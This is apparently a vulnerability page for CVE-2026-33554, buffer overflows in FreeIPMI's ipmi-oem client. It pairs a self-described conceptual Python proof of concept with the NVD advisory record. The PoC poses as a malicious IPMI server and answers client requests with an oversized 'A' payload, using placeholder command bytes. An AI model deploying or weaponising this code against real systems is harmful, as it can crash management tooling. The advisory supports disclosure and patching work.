CVE-2026-33554

#!/usr/bin/env python3 # Conceptual PoC for FreeIPMI ipmi-oem Buffer Overflow # This script simulates a malicious IPMI server response targeting the vulnerable ipmi-oem commands. import socket import struct IPMI_PORT = 623 def create_malicious_response(): # Constructing a response packet with an oversized payload to trigger the buffer overflow # The specific header and command bytes would depend on the targeted subcommand (e.g., Dell, Supermicro) header = b"\x00\x00\x00\x00" # Dummy Session ID target_cmd = b"\x00\x00" # Example command place holder # Payload size exceeding the buffer limit in FreeIPMI < 1.16.17 # A large string of 'A's (0x41) to overwrite the return address overflow_payload = b"A" * 1024 return header + target_cmd + overflow_payload def send_exploit(target_ip): try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.bind(("0.0.0.0", IPMI_PORT)) print(f"[*] Listening on port {IPMI_PORT}, waiting for ipmi-oem request from {target_ip}...") # Wait for request (simplified) data, addr = sock.recvfrom(1024) print(f"[*] Received request from {addr}") # Send malicious response malicious_packet = create_malicious_response() sock.sendto(malicious_packet, addr) print(f"[*] Malicious response sent to {addr}") except Exception as e: print(f"[!] Error: {e}") finally: sock.close() if __name__ == "__main__": # Note: This requires the target machine to initiate a connection to this script send_exploit("0.0.0.0")

{"cve": {"id": "CVE-2026-33554", "sourceIdentifier": "[email protected]", "published": "2026-03-24T15:16:35.743", "lastModified": "2026-04-27T19:18:46.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ipmi-oem in FreeIPMI before 1.16.17 has exploitable buffer overflows on response messages. The Intelligent Platform Management Interface (IPMI) specification defines a set of interfaces for platform management. It is implemented by a large number of hardware manufacturers to support system management. It is most commonly used for sensor reading (e.g., CPU temperatures through the ipmi-sensors command within FreeIPMI) and remote power control (the ipmipower command). The ipmi-oem client command implements a set of a IPMI OEM commands for specific hardware vendors. If a user has supported hardware, they may wish to use the ipmi-oem command to send a request to a server to retrieve specific information. Three subcommands were found to have exploitable buffer overflows on response messages. They are: \"ipmi-oem dell get-last-post-code - get the last POST code and string describing the error on some Dell servers,\" \"ipmi-oem supermicro extra-firmware-info - get extra firmware info on Supermicro servers,\" and \"ipmi-oem wistron read-proprietary-string - read a proprietary string on Wistron servers.\""}, {"lang": "es", "value": "ipmi-oem en FreeIPMI anterior a 1.16.17 tiene desbordamientos de búfer explotables en mensajes de respuesta. La especificación de la Interfaz de Gestión de Plataforma Inteligente (IPMI) define un conjunto de interfaces para la gestión de plataformas. Es implementada por un gran número de fabricantes de hardware para soportar la gestión del sistema. Se utiliza más comúnmente para la lectura de sensores (por ejemplo, temperaturas de CPU a través del comando ipmi-sensors dentro de FreeIPMI) y el control remoto de energía (el comando ipmipower). El comando cliente ipmi-oem implementa un conjunto de comandos IPMI OEM para proveedores de hardware específicos. Si un usuario tiene hardware compatible, puede desear usar el comando ipmi-oem para enviar una solicitud a un servidor para recuperar información específica. Se encontró que tres subcomandos tenían desbordamientos de búfer explotables en mensajes de respuesta. Son: 'ipmi-oem dell get-last-post-code - obtener el último código POST y la cadena que describe el error en algunos servidores Dell,' 'ipmi-oem supermicro extra-firmware-info - obtener información extra de firmware en servidores Supermicro,' y 'ipmi-oem wistron read-proprietary-string - leer una cadena propietaria en servidores Wistron.'"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://ftp.gnu.org/gnu/freeipmi/", "source": "[email protected]"}, {"url": "https://savannah.gnu.org/bugs/?68140", "source": "[email protected]"}, {"url": "https://savannah.gnu.org/bugs/?68141", "source": "[email protected]"}, {"url": "https://savannah.gnu.org/bugs/?68142", "source": "[email protected]"}]}}